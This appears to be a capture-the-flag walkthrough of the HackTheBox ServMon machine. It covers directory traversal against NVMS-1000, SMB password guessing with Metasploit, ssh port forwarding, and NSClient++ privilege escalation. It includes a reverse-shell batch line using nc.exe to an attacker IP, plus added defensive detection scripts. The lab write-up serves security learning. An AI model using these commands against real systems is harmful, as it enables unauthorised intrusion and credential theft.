Welcome to yet another of my HackTheBox technical walkthroughs. This time we will be hacking another nice Windows machine, one with a tricky point caused by too many service restarts from other colleagues. Let's dive right in and tackle the ServMon box!

nmap -sV 10.10.10.184

[...]
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
80/tcp   open  http
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
5666/tcp open  nrpe?
6699/tcp open  napster?
8443/tcp open  ssl/https-alt
[...]
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

As always I start off with an nmap scan, and the interesting things from the scan are the open ports and the operating system, which we already know is Windows. Not so many ports, so let's start our "reconnaissance" activity.

I can see port 80 open with a web server running, and another one on port 8443, but over https. Opening the two portals we understand that an NVMS-1000 system is running on port 80

http://10.10.10.184/

and NSClient++ on port 8443

https://10.10.10.184:8443/

I start searching exploit-db and this is what I find...

NSClient++ 0.5.2.35 - Privilege Escalation (local exploit for Windows platform)
TVT NVMS 1000 - Directory Traversal (CVE-2019-20085, webapps exploit for Hardware platform)
NVMS 1000 - Directory Traversal (webapps exploit for Hardware platform)


I also looked in the metasploit framework and...

msf5 > search nvms

Matching Modules
================

   #  Name                                       Disclosure Date  Rank    Check  Description
   -  ----                                       ---------------  ----    -----  -----------
   0  auxiliary/scanner/http/tvt_nvms_traversal  2019-12-12       normal  No     TVT NVMS-1000 Directory Traversal

Well, it's nice to know that something is there. Let's continue with the exploration: I try enum4linux, but nothing comes out. So I go back to the open ports and notice an active ftp service, and I try to work out whether anonymous access is available.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.184 - ServMon$ ftp
ftp> open 10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:in7rud3r): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:05PM       <DIR>          Users
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:06PM       <DIR>          Nadine
01-18-20  12:08PM       <DIR>          Nathan
226 Transfer complete.
ftp> cd Nadine
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:08PM                  174 Confidential.txt
226 Transfer complete.
ftp> cd ..
250 CWD command successful.
ftp> cd Nathan
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:10PM                  186 Notes to do.txt
226 Transfer complete.


Seems that I'm lucky today. From the session above you can see that I found two folders, probably linked to the respective users Nadine and Nathan. Inside each there's a text file with some interesting information, so I decide to download them and read them on my pc.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.184 - ServMon/attack/ftp-intrusion$ cat Confidential.txt 
Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine

############################

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.184 - ServMon/attack/ftp-intrusion$ cat Notes\ to\ do.txt 
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint


In the first one I read about a Passwords file available on the desktop of one of the users; in the second one there's a to-do list of completed and uncompleted tasks (I don't know if this could be useful later, but the first one is for sure information that we have to remember).

Among the open ports, we still have to check the ssh service.

OpenSSH 2.3 < 7.7 - Username Enumeration (CVE-2018-15473, remote exploit for Linux platform)
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC) (CVE-2018-15473, remote exploit for Linux platform)


...and on metasploit...

msf5 > search ssh_enum

Matching Modules
================

   #  Name                                     Disclosure Date  Rank    Check  Description
   -  ----                                     ---------------  ----    -----  -----------
   0  auxiliary/scanner/ssh/ssh_enum_git_keys                   normal  No     Test SSH Github Access
   1  auxiliary/scanner/ssh/ssh_enumusers                       normal  No     SSH Username Enumeration


msf5 > search ssh_log

Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  auxiliary/scanner/ssh/ssh_login                          normal  No     SSH Login Check Scanner
   1  auxiliary/scanner/ssh/ssh_login_pubkey                   normal  No     SSH Public Key Login Scanner


Ok, it's time to move on to the attack. As usual, I'd like to list all my attempts, including my mistakes, until I arrive at the correct solution.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.184 - ServMon/attack/48311 - NVMS 1000$ python3 48311.py http://10.10.10.184/ windows/win.ini win.ini
Host not vulnerable to Directory Traversal!


The NVMS portal does not seem to be vulnerable.

msf5 auxiliary(scanner/http/tvt_nvms_traversal) > options

Module options (auxiliary/scanner/http/tvt_nvms_traversal):

   Name       Current Setting   Required  Description
   ----       ---------------   --------  -----------
   DEPTH      13                yes       Depth for Path Traversal
   FILEPATH   /windows/win.ini  yes       The path to the file to read
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80                yes       The target port (TCP)
   SSL        false             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                 yes       The base URI path of nvms
   THREADS    1                 yes       The number of concurrent threads (max one per host)
   VHOST                        no        HTTP server virtual host

msf5 auxiliary(scanner/http/tvt_nvms_traversal) > set rhosts 10.10.10.184
rhosts => 10.10.10.184
msf5 auxiliary(scanner/http/tvt_nvms_traversal) > exploit

[-] Nothing was downloaded
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


Metasploit confirms it. I decide to try the ssh service.

msf5 auxiliary(scanner/ssh/ssh_enumusers) > options

Module options (auxiliary/scanner/ssh/ssh_enumusers):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CHECK_FALSE  false            no        Check for false positives (random username)
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        22               yes       The target port
   THREADS      1                yes       The number of concurrent threads (max one per host)
   THRESHOLD    10               yes       Amount of seconds needed before a user is considered found (timing attack only)
   USERNAME                      no        Single username to test (username spray)
   USER_FILE                     no        File containing usernames, one per line


Auxiliary action:

   Name              Description
   ----              -----------
   Malformed Packet  Use a malformed packet


msf5 auxiliary(scanner/ssh/ssh_enumusers) > set rhosts 10.10.10.184
rhosts => 10.10.10.184
msf5 auxiliary(scanner/ssh/ssh_enumusers) > set username Nathan
username => Nathan
msf5 auxiliary(scanner/ssh/ssh_enumusers) > exploit

[*] 10.10.10.184:22 - SSH - Using malformed packet technique
[*] 10.10.10.184:22 - SSH - Starting scan
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_enumusers) > set username Nadine
username => Nadine
msf5 auxiliary(scanner/ssh/ssh_enumusers) > exploit

[*] 10.10.10.184:22 - SSH - Using malformed packet technique
[*] 10.10.10.184:22 - SSH - Starting scan
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


The ssh service fails too, so I go back to my thoughts and realise that I chose the wrong file by following the exploit too literally. I have to merge what I know with what I have, so I try the directory traversal again, this time with a file that I am fairly sure exists and whose path on disk I can guess.

msf5 auxiliary(scanner/http/tvt_nvms_traversal) > options

Module options (auxiliary/scanner/http/tvt_nvms_traversal):

   Name       Current Setting                                    Required  Description
   ----       ---------------                                    --------  -----------
   DEPTH      13                                                 yes       Depth for Path Traversal
   FILEPATH   ../../../../../Users/Nathan/Desktop/Passwords.txt  yes       The path to the file to read
   Proxies                                                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.10.184                                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80                                                 yes       The target port (TCP)
   SSL        false                                              no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                                                  yes       The base URI path of nvms
   THREADS    1                                                  yes       The number of concurrent threads (max one per host)
   VHOST                                                         no        HTTP server virtual host

msf5 auxiliary(scanner/http/tvt_nvms_traversal) > set targeturi /Pages/
targeturi => /Pages/
msf5 auxiliary(scanner/http/tvt_nvms_traversal) > exploit

[+] 10.10.10.184:80 - Downloaded 156 bytes
[+] File saved in: /root/.msf4/loot/20200417175842_default_10.10.10.184_nvms.traversal_284939.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


Ahhh, fine, the gears begin to rotate in the right direction.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.184 - ServMon/attack$ cat 20200417175842_default_10.10.10.184_nvms.traversal_284939.txt 
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
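From the defender's side, the traversal above is only possible because the NVMS handler serves whatever path it is given without confining it to the web root. The following Python is an added example (not code from the original post or from the NVMS product): it fully URL-decodes a request path, normalises it against an assumed web root, and uses the same check both to harden a file lookup and to flag traversal attempts in constructed access-log lines modelled on the request this walkthrough made.

```python
import posixpath
import re
from urllib.parse import unquote

# Directory the web handler is supposed to serve from (assumed value).
WEB_ROOT = "/srv/nvms/www"

# Constructed sample access-log lines (not real ServMon traffic): a normal
# page request, the traversal used above, a URL-encoded variant, and a
# harmless file name that merely contains "..".
SAMPLE_LOG = """\
10.10.15.11 - - [17/Apr/2020:17:58:42 +0000] "GET /Pages/login.htm HTTP/1.1" 200 1122
10.10.15.11 - - [17/Apr/2020:17:58:43 +0000] "GET /Pages/../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1" 200 156
10.10.15.11 - - [17/Apr/2020:17:58:44 +0000] "GET /Pages/%2e%2e/%2e%2e/windows/win.ini HTTP/1.1" 200 92
10.10.15.11 - - [17/Apr/2020:17:58:45 +0000] "GET /Pages/notes..txt HTTP/1.1" 404 0
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+)'
)


def decode_path(raw):
    """URL-decode until stable (catches double encoding) and unify separators."""
    prev, cur = None, raw
    while cur != prev:
        prev, cur = cur, unquote(cur)
    return cur.replace("\\", "/")


def resolve(path):
    """Normalise the decoded request path underneath WEB_ROOT."""
    return posixpath.normpath(WEB_ROOT + "/" + decode_path(path).lstrip("/"))


def escapes_root(path):
    """True when the normalised path lands outside the web root."""
    target = resolve(path)
    return not (target == WEB_ROOT or target.startswith(WEB_ROOT + "/"))


def safe_resolve(path):
    """Hardened lookup: on-disk path, or None when the request leaves WEB_ROOT."""
    return None if escapes_root(path) else resolve(path)


def flag_traversal(log_text):
    """Return (source, raw path, status) for each request that escaped the root.

    A status of 200 on a flagged request means the server actually served the
    file, i.e. the traversal succeeded and the data left the host.
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and escapes_root(m["path"]):
            hits.append((m["src"], m["path"], int(m["status"])))
    return hits


if __name__ == "__main__":
    for src, path, status in flag_traversal(SAMPLE_LOG):
        print(f"{src} -> {path} (HTTP {status})")
```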


Fantastic. Now we have to understand where to use these passwords. Being Windows, I start with the most obvious thing, the SMB protocol.

msf5 auxiliary(scanner/smb/smb_login) > options 

Module options (auxiliary/scanner/smb/smb_login):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   ABORT_ON_LOCKOUT   false            yes       Abort the run when an account lockout is detected
   BLANK_PASSWORDS    false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED   5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS       false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS        false            no        Add all passwords in the current database to the list
   DB_ALL_USERS       false            no        Add all users in the current database to the list
   DETECT_ANY_AUTH    false            no        Enable detection of systems accepting any authentication
   DETECT_ANY_DOMAIN  false            no        Detect if domain is required for the specified user
   PASS_FILE                           no        File containing passwords, one per line
   PRESERVE_DOMAINS   true             no        Respect a username that contains a domain name.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RECORD_GUEST       false            no        Record guest-privileged random logins to the database
   RHOSTS                              yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT              445              yes       The SMB service port (TCP)
   SMBDomain          .                no        The Windows domain to use for authentication
   SMBPass                             no        The password for the specified username
   SMBUser                             no        The username to authenticate as
   STOP_ON_SUCCESS    false            yes       Stop guessing when a credential works for a host
   THREADS            1                yes       The number of concurrent threads (max one per host)
   USERPASS_FILE                       no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS       false            no        Try the username as the password for all users
   USER_FILE                           no        File containing usernames, one per line
   VERBOSE            true             yes       Whether to print output for all attempts

msf5 auxiliary(scanner/smb/smb_login) > set pass_file attack/20200417175842_default_10.10.10.184_nvms.traversal_284939.txt
pass_file => attack/20200417175842_default_10.10.10.184_nvms.traversal_284939.txt
msf5 auxiliary(scanner/smb/smb_login) > set rhosts 10.10.10.184
rhosts => 10.10.10.184
msf5 auxiliary(scanner/smb/smb_login) > set smbuser Nathan
smbuser => Nathan
msf5 auxiliary(scanner/smb/smb_login) > exploit

[*] 10.10.10.184:445      - 10.10.10.184:445 - Starting SMB login bruteforce
[-] 10.10.10.184:445      - 10.10.10.184:445 - Failed: '.\Nathan:1nsp3ctTh3Way2Mars!',
[-] 10.10.10.184:445      - 10.10.10.184:445 - Failed: '.\Nathan:Th3r34r3To0M4nyTrait0r5!',
[-] 10.10.10.184:445      - 10.10.10.184:445 - Failed: '.\Nathan:B3WithM30r4ga1n5tMe',
[-] 10.10.10.184:445      - 10.10.10.184:445 - Failed: '.\Nathan:L1k3B1gBut7s@W0rk',
[-] 10.10.10.184:445      - 10.10.10.184:445 - Failed: '.\Nathan:0nly7h3y0unGWi11F0l10w',
[-] 10.10.10.184:445      - 10.10.10.184:445 - Failed: '.\Nathan:IfH3s4b0Utg0t0H1sH0me',
[-] 10.10.10.184:445      - 10.10.10.184:445 - Failed: '.\Nathan:Gr4etN3w5w17hMySk1Pa5$',
[*] 10.10.10.184:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


Mmmmm, this is really strange. I try the password list for the user Nadine as well, convinced that it isn't a logical idea but that it's better to try, and to my big surprise...

msf5 auxiliary(scanner/smb/smb_login) > set smbuser Nadine
smbuser => Nadine
msf5 auxiliary(scanner/smb/smb_login) > exploit

[*] 10.10.10.184:445      - 10.10.10.184:445 - Starting SMB login bruteforce
[-] 10.10.10.184:445      - 10.10.10.184:445 - Failed: '.\Nadine:1nsp3ctTh3Way2Mars!',
[-] 10.10.10.184:445      - 10.10.10.184:445 - Failed: '.\Nadine:Th3r34r3To0M4nyTrait0r5!',
[-] 10.10.10.184:445      - 10.10.10.184:445 - Failed: '.\Nadine:B3WithM30r4ga1n5tMe',
[+] 10.10.10.184:445      - 10.10.10.184:445 - Success: '.\Nadine:L1k3B1gBut7s@W0rk'
[*] 10.10.10.184:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


Interesting; I probably misinterpreted the notes, but it doesn't matter, let's move on. I know that I can use this password for SMB, so I would like to know which shared folders are available on the machine.
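Before moving on, this is what the smb_login runs above look like from the blue-team side: one source host producing a burst of failed logons against several accounts, then a success for one of them. The Python below is an added example (not part of the original post) that runs that logic over constructed Windows Security events (4625 failed logon, 4624 successful logon) shaped like the two attempts against Nathan and Nadine; the timestamps, source addresses and thresholds are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real ServMon logs), mirroring the runs above:
# seven failures for Nathan, three for Nadine, then one success for Nadine,
# all from one source, plus an unrelated normal logon from another host.
# Fields: (event_id, timestamp, source_ip, target_user).
SAMPLE_EVENTS = [
    (4625, "2020-04-17T18:02:01", "10.10.15.11", "Nathan"),
    (4625, "2020-04-17T18:02:02", "10.10.15.11", "Nathan"),
    (4625, "2020-04-17T18:02:03", "10.10.15.11", "Nathan"),
    (4625, "2020-04-17T18:02:04", "10.10.15.11", "Nathan"),
    (4625, "2020-04-17T18:02:05", "10.10.15.11", "Nathan"),
    (4625, "2020-04-17T18:02:06", "10.10.15.11", "Nathan"),
    (4625, "2020-04-17T18:02:07", "10.10.15.11", "Nathan"),
    (4625, "2020-04-17T18:02:20", "10.10.15.11", "Nadine"),
    (4625, "2020-04-17T18:02:21", "10.10.15.11", "Nadine"),
    (4625, "2020-04-17T18:02:22", "10.10.15.11", "Nadine"),
    (4624, "2020-04-17T18:02:23", "10.10.15.11", "Nadine"),
    (4624, "2020-04-17T18:30:00", "10.10.15.20", "Nadine"),
]

FAILED, SUCCESS = 4625, 4624


def detect_spray(events, window=timedelta(minutes=5), fail_threshold=5):
    """Group events per source host and return a list of findings.

    Two patterns are reported: a burst of at least fail_threshold failures
    inside one window (the spray itself) and a success preceded by failures
    from the same source inside the window (the password that finally fit).
    """
    by_src = defaultdict(list)
    for event_id, ts, src, user in events:
        by_src[src].append((datetime.fromisoformat(ts), event_id, user))

    findings = []
    for src, evs in by_src.items():
        evs.sort()
        fails = [(t, u) for t, e, u in evs if e == FAILED]

        # Sliding window over the failures: first window that crosses the
        # threshold is reported once, with the set of accounts targeted.
        for i, (t0, _) in enumerate(fails):
            in_window = [u for t, u in fails[i:] if t - t0 <= window]
            if len(in_window) >= fail_threshold:
                findings.append({"src": src, "type": "failure_burst",
                                 "count": len(in_window),
                                 "users": sorted(set(in_window))})
                break

        # A success right after failures from the same host is the signal
        # that credential reuse or guessing paid off.
        for t, e, u in evs:
            if e == SUCCESS:
                prior = [1 for ft, _ in fails if t - window <= ft < t]
                if prior:
                    findings.append({"src": src, "type": "success_after_failures",
                                     "user": u, "prior_failures": len(prior)})
    return findings


if __name__ == "__main__":
    for f in detect_spray(SAMPLE_EVENTS):
        print(f)
```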

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.184 - ServMon/attack$ smbclient -L 10.10.10.184 -U Nadine
Enter WORKGROUP\Nadine's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
SMB1 disabled -- no workgroup available
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.184 - ServMon/attack$ smbclient //10.10.10.184/C$ -U Nadine
Enter WORKGROUP\Nadine's password: 
tree connect failed: NT_STATUS_ACCESS_DENIED
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.184 - ServMon/attack$ smbclient //10.10.10.184/ADMIN$ -U Nadine
Enter WORKGROUP\Nadine's password: 
tree connect failed: NT_STATUS_ACCESS_DENIED


Ouch, something comes out, but immediately afterwards another closed door. What's next? Another available service is ssh, so why not try? And...

ssh -l Nadine 10.10.10.184

Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Users\Nadine

17/04/2020  17:33    <DIR>          .
17/04/2020  17:33    <DIR>          ..
17/04/2020  17:33    <DIR>          .ssh
18/01/2020  11:23    <DIR>          3D Objects
18/01/2020  11:23    <DIR>          Contacts
08/04/2020  22:28    <DIR>          Desktop
08/04/2020  22:28    <DIR>          Documents
18/01/2020  11:23    <DIR>          Downloads
08/04/2020  22:27    <DIR>          Favorites
08/04/2020  22:27    <DIR>          Links
18/01/2020  11:23    <DIR>          Music
18/01/2020  11:31    <DIR>          OneDrive
18/01/2020  11:23    <DIR>          Pictures
18/01/2020  11:23    <DIR>          Saved Games
18/01/2020  11:23    <DIR>          Searches
18/01/2020  11:23    <DIR>          Videos
               0 File(s)              0 bytes
              16 Dir(s)  27,343,183,872 bytes free

nadine@SERVMON C:\Users\Nadine>cd Desktop

nadine@SERVMON C:\Users\Nadine\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Users\Nadine\Desktop

08/04/2020  22:28    <DIR>          .
08/04/2020  22:28    <DIR>          ..
17/04/2020  17:30                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)  27,343,159,296 bytes free

nadine@SERVMON C:\Users\Nadine\Desktop>more user.txt
6******************************0

Bingo, the first flag is mine.

Now, if you remember (and if you have had a look at the exploit-db pages I linked at the beginning of this tutorial), the exploit for the NSClient++ portal needs a credential without administrative privileges (our scenario), so you only have to follow the step-by-step procedure described in the exploit. Let's do that.

1. Grab web administrator password

[...]
; Undocumented key
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts = 127.0.0.1
[...]


Both methods work, but with the first one I found information that helps me to proceed with the attack: access to the portal is allowed only from the local machine (127.0.0.1).

Now, I can't reach the portal from my remote pc, so I have to find a way to expose it on my localhost through the process running on the remote pc. I don't know exactly how to accomplish this, but an internet search (ssh local port forwarding) is enough to find a solution.

I read an Italian article, which I provide here because with a simple translation you can read it too; I found a clear explanation in it and, for once, I enjoyed reading in my native language. The solution is simple and uses the ssh service we already have.

ssh Nadine@10.10.10.184  -L  8443:127.0.0.1:8443

This will open a shell on the remote machine (which you can also use to execute remote commands) and will forward port 8443 of the remote web portal to the same port on your local machine.

Before we go on, we need to look deeper into the exploit. Consider that you are now entering the part of the attack where you could lose a lot of time, because you have to restart part of the service; the problem is that, while you are trying to hack the machine, many other "colleagues" are doing the same thing, so you will probably be thrown out many times and will have to sweat a lot to reach your goal. Anyway, you need nc.exe (netcat for Windows) and a batch file that launches it. I chose to put all my files in a custom folder inside the Temp directory, so my batch file is this:

@echo off
c:\temp\46802\nc.exe 10.10.15.11 443 -e cmd.exe

Also in this case I don't know exactly how to upload the file, but google is always our friend.

How to upload local file to server through Linux terminal
I am trying to upload local files to server by using Putty or SSH but not getting upload there. Is there any direct method to upload file from local to server from Linux terminal without using FTP...

3. Download nc.exe and evil.bat to c:\temp from attacking machine

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.184 - ServMon/attack/evil$ scp nc.exe Nadine@10.10.10.184:\\Temp\\46802\\nc.exe
Nadine@10.10.10.184's password: 
nc.exe                                                                                            100%   20KB  30.7KB/s   00:00    
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.184 - ServMon/attack/evil$ scp evil.bat Nadine@10.10.10.184:\\Temp\\46802\\evil.bat
Nadine@10.10.10.184's password: 
evil.bat                                                                                          100%   61     1.0KB/s   00:00    


Ok, let's go ahead with the exploit, but we skipped the second point (you should access the portal at https://127.0.0.1:8443/):

2. Login and enable following modules including enable at startup and save configuration
- CheckExternalScripts
- Scheduler

No problem anyway: the two modules are already enabled.

4. Setup listener on attacking machine

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.184 - ServMon/attack/evil$ sudo nc -nlvvp 443
[sudo] password for in7rud3r: 
listening on [any] 443 ...


Well, from now on the situation is critical and you will have to try these last three steps many, many times until it works. Pay attention: if the machine is restarted in the meantime, you will have to redeploy the files you prepared. A suggestion is to use names different from those suggested in the exploit, because everybody will probably follow the same tutorial and use the same variables and names, and someone could overwrite your settings.

If you perform all the steps correctly, sooner or later you should see your listener come alive with a shell from the remote machine, and from there you'll reach the second flag!

connect to [10.10.15.11] from (UNKNOWN) [10.10.10.184] 50811
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Program Files\NSClient++>whoami
whoami
nt authority\system

C:\Program Files\NSClient++>cd \Users\administrator
cd \Users\administrator\Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Users\Administrator\Desktop

08/04/2020  23:12    <DIR>          .
08/04/2020  23:12    <DIR>          ..
17/04/2020  21:35                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)  27,410,821,120 bytes free

C:\Users\Administrator\Desktop>more root.txt    
more root.txt
5******************************e
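Looking back at the escalation from the administrator's side, everything hinged on a handful of NSClient++ settings: a readable configuration holding the web password, external scripts and the scheduler enabled, and an "allowed hosts" restriction that a local low-privileged user can sidestep with the port forward shown earlier. The Python below is an added example (not code from the original post or from NSClient++) that audits a constructed nsclient.ini for exactly those conditions; the section names [/settings/default] and [/modules] follow the NSClient++ layout as I know it and should be treated as an assumption to check against your own installation.

```python
import configparser

# Constructed sample nsclient.ini (not the ServMon file). Section and key
# names follow the NSClient++ layout as assumed in the lead-in.
SAMPLE_INI = """\
[/settings/default]
; Undocumented key
password = CONSTRUCTED_EXAMPLE_PASSWORD
; Undocumented key
allowed hosts = 127.0.0.1

[/modules]
CheckExternalScripts = enabled
Scheduler = enabled
WEBServer = enabled
"""

LOCAL_ONLY = {"127.0.0.1", "::1", "localhost"}


def load_ini(text):
    """Parse the INI text, keeping key case (CheckExternalScripts vs. scheduler)."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str
    cp.read_string(text)
    return cp


def is_enabled(cp, section, key):
    value = cp.get(section, key, fallback="").strip().lower()
    return value in ("enabled", "1", "true")


def audit(text):
    """Return the list of risk codes found in an NSClient++ configuration."""
    cp = load_ini(text)
    findings = []

    # Running arbitrary external scripts is the capability the escalation
    # above relied on; with the scheduler it also runs them unattended.
    ext_scripts = is_enabled(cp, "/modules", "CheckExternalScripts")
    if ext_scripts:
        findings.append("external-scripts-enabled")
    if ext_scripts and is_enabled(cp, "/modules", "Scheduler"):
        findings.append("scheduler-with-external-scripts")

    # A cleartext web password in a file readable by ordinary users is what
    # step 1 of the exploit harvested; the fix is file ACLs plus rotation.
    if cp.get("/settings/default", "password", fallback="").strip():
        findings.append("cleartext-password-in-config")

    # Restricting to localhost does not stop a local user who can forward
    # the port over ssh, so report it as a reminder rather than a control.
    hosts = [h.strip() for h in
             cp.get("/settings/default", "allowed hosts", fallback="").split(",")
             if h.strip()]
    if hosts and all(h in LOCAL_ONLY for h in hosts):
        findings.append("localhost-only-allowed-hosts")

    return findings


if __name__ == "__main__":
    for code in audit(SAMPLE_INI):
        print(code)
```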


That's all folks, thanks for reading!

The image used in this article is called Summon Your Eagle Powers and was created by Nicholas Roberts.